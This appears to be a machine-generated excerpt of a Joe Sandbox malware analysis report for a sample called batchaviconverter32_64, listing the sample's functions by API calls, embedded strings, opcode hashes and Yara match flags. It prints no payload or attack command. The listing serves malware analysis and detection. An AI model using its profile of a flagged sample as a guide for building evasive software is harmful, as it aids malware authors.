                                                              • API ID: CriticalSection$EnterLeave$H_prolog
                                                              • String ID:
                                                              • API String ID: 1633115879-0
                                                              • Opcode ID: faa9f9035bbf23af688ca3a72f4a817a3f647c5e4da236ea439ac27c7febc672
                                                              • Instruction ID: e9ff18df7ae63c50a2aaac6b2419ea1a90e3f2e10084f00407040c71423ba734
                                                              • Opcode Fuzzy Hash: faa9f9035bbf23af688ca3a72f4a817a3f647c5e4da236ea439ac27c7febc672
                                                              • Instruction Fuzzy Hash: CC218BB5A00214DFDB14DF68C444B9AFBB5FF49714F208589E85997301D774ED0ACBA0
                                                              APIs
                                                              • _malloc.LIBCMT ref: 02DA02F0
                                                                • Part of subcall function 02D92EDC: __FF_MSGBANNER.LIBCMT ref: 02D92EF3
                                                                • Part of subcall function 02D92EDC: __NMSG_WRITE.LIBCMT ref: 02D92EFA
                                                                • Part of subcall function 02D92EDC: RtlAllocateHeap.NTDLL(00730000,00000000,00000001), ref: 02D92F1F
                                                              • _free.LIBCMT ref: 02DA0303
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap_free_malloc
                                                              • String ID:
                                                              • API String ID: 1020059152-0
                                                              • Opcode ID: 76aa4bca27ed6bd9a3225e01b065689d2ae20725fd11b4082dfeea10b15ae0af
                                                              • Instruction ID: 771ed6986718801212dc29418df03864d31f06f2de8d1c95949fc6e41b4bc060
                                                              • Opcode Fuzzy Hash: 76aa4bca27ed6bd9a3225e01b065689d2ae20725fd11b4082dfeea10b15ae0af
                                                              • Instruction Fuzzy Hash: 35110632909615EFDF213F74B868F5A3799DF05362F104529FA899A390DB30DC50CAE4
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D821DA
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D821ED
                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,00000001), ref: 02D82224
                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,00000001), ref: 02D82237
                                                              • TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02D82261
                                                                • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                                • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                                • Part of subcall function 02D82341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                                • Part of subcall function 02D82341: GetLastError.KERNEL32 ref: 02D8237A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 1856819132-0
                                                              • Opcode ID: ca37b8d0cb1544dcbf8058c8d56962946ad568fd0cf975207385f1704a91680f
                                                              • Instruction ID: 77d7ff6edf5fdf463c8e3b191d7162d606b7ce4ae13b775bfeb0db60e0f2d7ca
                                                              • Opcode Fuzzy Hash: ca37b8d0cb1544dcbf8058c8d56962946ad568fd0cf975207385f1704a91680f
                                                              • Instruction Fuzzy Hash: 5F118172D04154DBDB01AFA4D808AAEFBBAFF44310F10851AE855A2360D7714E51DB91
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8229D
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D822B0
                                                              • TlsGetValue.KERNEL32 ref: 02D822E7
                                                              • TlsSetValue.KERNEL32(?), ref: 02D82300
                                                              • TlsSetValue.KERNEL32(?,?,?), ref: 02D8231C
                                                                • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82350
                                                                • Part of subcall function 02D82341: InterlockedExchange.KERNEL32(?,00000001), ref: 02D82360
                                                                • Part of subcall function 02D82341: PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02D82370
                                                                • Part of subcall function 02D82341: GetLastError.KERNEL32 ref: 02D8237A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlockedValue$CompletionErrorH_prologLastPostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 1856819132-0
                                                              • Opcode ID: e6c2e0c0412b497509c4e5ed3de713abea6084867dad4979f634d21db72e11e4
                                                              • Instruction ID: 2ff7f2a518db1d6c5c3116551b7b9028c7ebe0a213fd4ae3919ab1c68c54e418
                                                              • Opcode Fuzzy Hash: e6c2e0c0412b497509c4e5ed3de713abea6084867dad4979f634d21db72e11e4
                                                              • Instruction Fuzzy Hash: 5A116072D10118EBDB02AFA4D814AAEFFBAFF54310F10451AE805A3350D7714D51DF90
                                                              APIs
                                                                • Part of subcall function 02D8B097: __EH_prolog.LIBCMT ref: 02D8B09C
                                                              • __CxxThrowException@8.LIBCMT ref: 02D8BC61
                                                                • Part of subcall function 02D9448A: RaiseException.KERNEL32(?,?,02D8FA91,?,?,?,?,?,?,?,02D8FA91,?,02DB0F88,?), ref: 02D944DF
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,02DB1DA4,?,00000001), ref: 02D8BC77
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D8BC8A
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,?,?,02DB1DA4,?,00000001), ref: 02D8BC9A
                                                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02D8BCA8
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExchangeInterlocked$CompletionExceptionException@8H_prologObjectPostQueuedRaiseSingleStatusThrowWait
                                                              • String ID:
                                                              • API String ID: 2725315915-0
                                                              • Opcode ID: bba6eeb7e625f9c961ad69e1e783fd5e35437dfbbc5b317781357c98dd6d7d04
                                                              • Instruction ID: 09e45b050dd1cb3740f02f177fc4638d90b0e0279841d654a15b5f570176bf3e
                                                              • Opcode Fuzzy Hash: bba6eeb7e625f9c961ad69e1e783fd5e35437dfbbc5b317781357c98dd6d7d04
                                                              • Instruction Fuzzy Hash: C00181B2A40304AFEB10AEB4DC89F9BB7BDEB04759F104915F625D7390DBA0EC058B60
                                                              APIs
                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02D82432
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D82445
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D82454
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82469
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D82470
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalExchangeInterlockedSection$CompareCompletionEnterLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 747265849-0
                                                              • Opcode ID: 90ceb651a779b50b60fc13977600b86d49d599875299424682a262be7f06c083
                                                              • Instruction ID: a1b0676cf97954e4b9beb8833b21adccc8f831324822ec4dbc960ad8fa14ed44
                                                              • Opcode Fuzzy Hash: 90ceb651a779b50b60fc13977600b86d49d599875299424682a262be7f06c083
                                                              • Instruction Fuzzy Hash: 68F01D72641204BFE700AAA5ED4AFDAB72CFB44711FA04811F601D6680D761AD20CBB5
                                                              APIs
                                                              • InterlockedIncrement.KERNEL32(?), ref: 02D81ED2
                                                              • PostQueuedCompletionStatus.KERNEL32(?,?,?,00000000,00000000,?), ref: 02D81EEA
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D81EF9
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D81F0E
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D81F15
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalInterlockedSection$CompletionEnterExchangeIncrementLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 830998967-0
                                                              • Opcode ID: 99d2522600ff2859bb70b6c291b29f99637a578cabbecc939ec9f0c535df3e2e
                                                              • Instruction ID: 789de55ff4e493a2dd59e91119654212bd5ff4034273801a00d5a4e33f77dbad
                                                              • Opcode Fuzzy Hash: 99d2522600ff2859bb70b6c291b29f99637a578cabbecc939ec9f0c535df3e2e
                                                              • Instruction Fuzzy Hash: 15F03A72641605BBE700AFA1ED89FDABB3CFF44341F100416F60186680D775E925CBE4
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: invalid string position$string too long
                                                              • API String ID: 4104443479-4289949731
                                                              • Opcode ID: a46836990606f4ddd4bb62811bfb7627ac44463cdc0bf67f36bdb490c76b14c7
                                                              • Instruction ID: 2c66b51208b2cfb6358906b1b23611dbaf05b23248d6a1a6f41e4116710549fd
                                                              • Opcode Fuzzy Hash: a46836990606f4ddd4bb62811bfb7627ac44463cdc0bf67f36bdb490c76b14c7
                                                              • Instruction Fuzzy Hash: 4F41A1313003489FDB24AE69DC84E6AB7BAEB41764B90092DE856CB781D770EC04DBA0
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D830C3
                                                              • WSAStringToAddressA.WS2_32(?,?,00000000,?,?), ref: 02D83102
                                                              • _memcmp.LIBCMT ref: 02D83141
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressErrorLastString_memcmp
                                                              • String ID: 255.255.255.255
                                                              • API String ID: 1618111833-2422070025
                                                              • Opcode ID: 0b6040506f2ecd65f950dbd49d44496c288e541548e77484067506b167b736b1
                                                              • Instruction ID: 860af0deb8a6ef422bc500f04f3e3884863d2a2c253737689012d55deb67ddca
                                                              • Opcode Fuzzy Hash: 0b6040506f2ecd65f950dbd49d44496c288e541548e77484067506b167b736b1
                                                              • Instruction Fuzzy Hash: 7031B175A003089FDF20AF64C880B7EB7A6EF45B25F1085A9E86D97380DB729D41CB91
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D8CBE6
                                                                • Part of subcall function 02D8D1C2: std::exception::exception.LIBCMT ref: 02D8D1F1
                                                                • Part of subcall function 02D8D978: __EH_prolog.LIBCMT ref: 02D8D97D
                                                                • Part of subcall function 02D93A7C: _malloc.LIBCMT ref: 02D93A94
                                                                • Part of subcall function 02D8D221: __EH_prolog.LIBCMT ref: 02D8D226
                                                              Strings
                                                              • P2t, xrefs: 02D8CC75, 02D8CC9D
                                                              • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02D8CC1C
                                                              • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D8CC23
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$_mallocstd::exception::exception
                                                              • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$P2t$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                              • API String ID: 1953324306-826603865
                                                              • Opcode ID: 3ac2835462b181613b56ffd06ec99a0f762ffa174a7ce4897adba8b749851c5c
                                                              • Instruction ID: f2645b003b97db0a96619bd6065bb27a76281f63425c6e8540f7e23255a2a311
                                                              • Opcode Fuzzy Hash: 3ac2835462b181613b56ffd06ec99a0f762ffa174a7ce4897adba8b749851c5c
                                                              • Instruction Fuzzy Hash: 70216D71E05244DBDB14EFE8D964AEEBBB6EF54704F04405DE805A7390DB709E44CB61
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D81F5B
                                                              • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02D81FC5
                                                              • GetLastError.KERNEL32(?,00000000), ref: 02D81FD2
                                                                • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$CompletionCreateErrorLastPort
                                                              • String ID: iocp
                                                              • API String ID: 998023749-976528080
                                                              • Opcode ID: 2dad324368abceeb1c7672cba7a139a49b0b8cbefc80cd3f4593a919cb8333a7
                                                              • Instruction ID: 0b80eeec56c4f2850c47fefab473c700e26c163920de16abdc68494bca8d6950
                                                              • Opcode Fuzzy Hash: 2dad324368abceeb1c7672cba7a139a49b0b8cbefc80cd3f4593a919cb8333a7
                                                              • Instruction Fuzzy Hash: BA21D8B18017449BC720DF6AD50055BFBF8FF94720B108A1FD49683B90D7B0AA04CF91
                                                              APIs
                                                              • _malloc.LIBCMT ref: 02D93A94
                                                                • Part of subcall function 02D92EDC: __FF_MSGBANNER.LIBCMT ref: 02D92EF3
                                                                • Part of subcall function 02D92EDC: __NMSG_WRITE.LIBCMT ref: 02D92EFA
                                                                • Part of subcall function 02D92EDC: RtlAllocateHeap.NTDLL(00730000,00000000,00000001), ref: 02D92F1F
                                                              • std::exception::exception.LIBCMT ref: 02D93AB2
                                                              • __CxxThrowException@8.LIBCMT ref: 02D93AC7
                                                                • Part of subcall function 02D9448A: RaiseException.KERNEL32(?,?,02D8FA91,?,?,?,?,?,?,?,02D8FA91,?,02DB0F88,?), ref: 02D944DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                              • String ID: bad allocation
                                                              • API String ID: 3074076210-2104205924
                                                              • Opcode ID: 4a53fe06539fc47819c96f1f376529a9b7c930518bc7cab455263ff56c7e2eb0
                                                              • Instruction ID: 3640d77da0df004dcab725682f63fe03f9a8db7d648d1bfc19a5315a9950d6e7
                                                              • Opcode Fuzzy Hash: 4a53fe06539fc47819c96f1f376529a9b7c930518bc7cab455263ff56c7e2eb0
                                                              • Instruction Fuzzy Hash: A6E0A03050020EAADF00EAA0DC149AFB779EB01340F000196F814A1790DB70CE04D9E0
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D837B6
                                                              • __localtime64.LIBCMT ref: 02D837C1
                                                                • Part of subcall function 02D92530: __gmtime64_s.LIBCMT ref: 02D92543
                                                              • std::exception::exception.LIBCMT ref: 02D837D9
                                                                • Part of subcall function 02D92403: std::exception::_Copy_str.LIBCMT ref: 02D9241C
                                                                • Part of subcall function 02D8A45A: __EH_prolog.LIBCMT ref: 02D8A45F
                                                                • Part of subcall function 02D8A45A: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A46E
                                                                • Part of subcall function 02D8A45A: __CxxThrowException@8.LIBCMT ref: 02D8A48D
                                                              Strings
                                                              • could not convert calendar time to UTC time, xrefs: 02D837CE
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
                                                              • String ID: could not convert calendar time to UTC time
                                                              • API String ID: 1963798777-2088861013
                                                              • Opcode ID: f792382161f6cb032275c57dfd67768cebee1408723b1ec7bb686cd4dc88514c
                                                              • Instruction ID: 8b0e29e52098a56c90030309e2ac723352d19212afb3a2a00122dadc08328e27
                                                              • Opcode Fuzzy Hash: f792382161f6cb032275c57dfd67768cebee1408723b1ec7bb686cd4dc88514c
                                                              • Instruction Fuzzy Hash: 93E06DB1D0120AABCF00EF94E828BAEB779EB04301F404599EC24A2740EB345E06CEA5
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32 ref: 00402685
                                                              • GetCommandLineW.KERNEL32(?), ref: 0040B90F
                                                              • CommandLineToArgvW.SHELL32(00000000), ref: 0040B916
                                                              Strings
                                                              • DKIM Authenticator lib 9.11.45, xrefs: 0040268B
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: CommandLine$ArgvFileModuleName
                                                              • String ID: DKIM Authenticator lib 9.11.45
                                                              • API String ID: 722113969-992513482
                                                              • Opcode ID: 972b9c2e4087f6865a4fe1009c5827cae625d068c19bab819f2d61946da373ea
                                                              • Instruction ID: 763924a671eada478072756af9f095103c4065abeb9d3d9f0cb9dcfd3342fd83
                                                              • Opcode Fuzzy Hash: 972b9c2e4087f6865a4fe1009c5827cae625d068c19bab819f2d61946da373ea
                                                              • Instruction Fuzzy Hash: 24D0C272044509BBC20097A0AA4CA2E27E4E60E716331003BF103B51D1DA7C1550476E
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,00008000,00004000,7591DFF0,?,00000000), ref: 00404092
                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 004040ED
                                                              • HeapFree.KERNEL32(00000000,?), ref: 004040FF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: Free$Virtual$Heap
                                                              • String ID: -@
                                                              • API String ID: 2016334554-2999422947
                                                              • Opcode ID: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                              • Instruction ID: d55dda63c6158a3f001c35490e62a79414290c04420ce97baa52a0c06dad31a7
                                                              • Opcode Fuzzy Hash: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
                                                              • Instruction Fuzzy Hash: D1B16C75A00205DFDB24CF04CA90AA9BBB1FB88314F24C1AED9196F396C735EE41CB84
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AdjustPointer_memmove
                                                              • String ID:
                                                              • API String ID: 1721217611-0
                                                              • Opcode ID: ed8d5b77d47f8358beeb194a57e3a1ae37186eb000ad157300fbdfc92325203c
                                                              • Instruction ID: d92b7fb3fd42b8c79eaed01ec31a4d5932e318eba2de824d9c4330549bc6fa72
                                                              • Opcode Fuzzy Hash: ed8d5b77d47f8358beeb194a57e3a1ae37186eb000ad157300fbdfc92325203c
                                                              • Instruction Fuzzy Hash: 4341B2363147029AEF285F64D860B7A33A6DF0A714F24401FF885863E1EB75ED90CA32
                                                              APIs
                                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D912EF
                                                                • Part of subcall function 02D83FDC: __EH_prolog.LIBCMT ref: 02D83FE1
                                                                • Part of subcall function 02D83FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02D83FF3
                                                              • CloseHandle.KERNEL32(00000000), ref: 02D912E4
                                                              • CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D91330
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02D84149), ref: 02D91401
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseHandle$Event$CreateH_prolog
                                                              • String ID:
                                                              • API String ID: 2825413587-0
                                                              • Opcode ID: 88e6bbb9bdfcea3d63f7ded9d777af110faa18776323f12810986a88f0021c49
                                                              • Instruction ID: 7e86ed4d50ee2e82270204251153ae078e0105f35db6ce7080c1d28c0da5ea1f
                                                              • Opcode Fuzzy Hash: 88e6bbb9bdfcea3d63f7ded9d777af110faa18776323f12810986a88f0021c49
                                                              • Instruction Fuzzy Hash: EF517A716002468BDF21DF28C884B9AB7E4AF49328F194628F8ADA7390D735EC05CF95
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                              • String ID:
                                                              • API String ID: 2782032738-0
                                                              • Opcode ID: a8d32efa6cdd182728da25395dc61dfffc92a71ccbee65bad4900e2d45c96823
                                                              • Instruction ID: f8dec92a61fff42543cc10ed57fce759f0fa3215be4889579ec8c579c2ffbd93
                                                              • Opcode Fuzzy Hash: a8d32efa6cdd182728da25395dc61dfffc92a71ccbee65bad4900e2d45c96823
                                                              • Instruction Fuzzy Hash: 8B41BEB5B00606ABDFA88FA9C8905AEBBB6EF40364B1481BDF805C7384D772DD41CB50
                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D9FE7B
                                                              • __isleadbyte_l.LIBCMT ref: 02D9FEA9
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02D9FED7
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02D9FF0D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: 7fb807fdd9081f1fa4646c0ea3b128175883b936bcc8c7233e03a67d98411328
                                                              • Instruction ID: 30df72d73908d7cdf4ad5358cf8043bfc9cbe29a11334dabfcb0ceafdcf4b43d
                                                              • Opcode Fuzzy Hash: 7fb807fdd9081f1fa4646c0ea3b128175883b936bcc8c7233e03a67d98411328
                                                              • Instruction Fuzzy Hash: 1A318D3160024AAFEF21CF65C844BAA7BAAFF41314F154569F868C7691E731DC51CBA0
                                                              APIs
                                                              • VirtualFree.KERNEL32(FFFFFFFF,00001000,00004000,7591DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3,?,?), ref: 004047F0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID: -@$r@$r@
                                                              • API String ID: 1263568516-1251997348
                                                              • Opcode ID: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                              • Instruction ID: a63ca1888fca441bf056fbcf5d5deb39584b298cc2094c54b415f4e68fc1e946
                                                              • Opcode Fuzzy Hash: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
                                                              • Instruction Fuzzy Hash: EE21A1B66003419BDB20AB24DD4476633A4EB81379F24CA3BDB65B66D0D378E941CB58
                                                              APIs
                                                              • htons.WS2_32(?), ref: 02D83DA2
                                                                • Part of subcall function 02D83BD3: __EH_prolog.LIBCMT ref: 02D83BD8
                                                                • Part of subcall function 02D83BD3: std::bad_exception::bad_exception.LIBCMT ref: 02D83BED
                                                              • htonl.WS2_32(00000000), ref: 02D83DB9
                                                              • htonl.WS2_32(00000000), ref: 02D83DC0
                                                              • htons.WS2_32(?), ref: 02D83DD4
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                                                              • String ID:
                                                              • API String ID: 3882411702-0
                                                              • Opcode ID: 996dc61b3ef53d79eb2f56b558d00e602a5177a077722ead19e006dce39b51b3
                                                              • Instruction ID: 344b09f7ac92c841658670af48fd2214ac5eb1e26639ae0a9658c9bc6ad11d7e
                                                              • Opcode Fuzzy Hash: 996dc61b3ef53d79eb2f56b558d00e602a5177a077722ead19e006dce39b51b3
                                                              • Instruction Fuzzy Hash: DA117C75A00209EBDF01AF64D885EAAB7B9EF09710F008496FD08DF305E6719E14CBA1
                                                              APIs
                                                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02D823D0
                                                              • RtlEnterCriticalSection.NTDLL(?), ref: 02D823DE
                                                              • InterlockedExchange.KERNEL32(?,00000001), ref: 02D82401
                                                              • RtlLeaveCriticalSection.NTDLL(?), ref: 02D82408
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
                                                              • String ID:
                                                              • API String ID: 4018804020-0
                                                              • Opcode ID: 6649864b52e9b093aeb7dd8013284c28ad55140bc11482fc6cf5bb3c9fea6e9e
                                                              • Instruction ID: f7cde088385448701f84d431b7cd91fec310889a190644a1c9215e21562a1d13
                                                              • Opcode Fuzzy Hash: 6649864b52e9b093aeb7dd8013284c28ad55140bc11482fc6cf5bb3c9fea6e9e
                                                              • Instruction Fuzzy Hash: 96118E71600205ABEB10AF65D989F6ABBB9FF54705F20446DE9019B240E7B1ED51CBA0
                                                              APIs
                                                              • WSASetLastError.WS2_32(00000000), ref: 02D82EEE
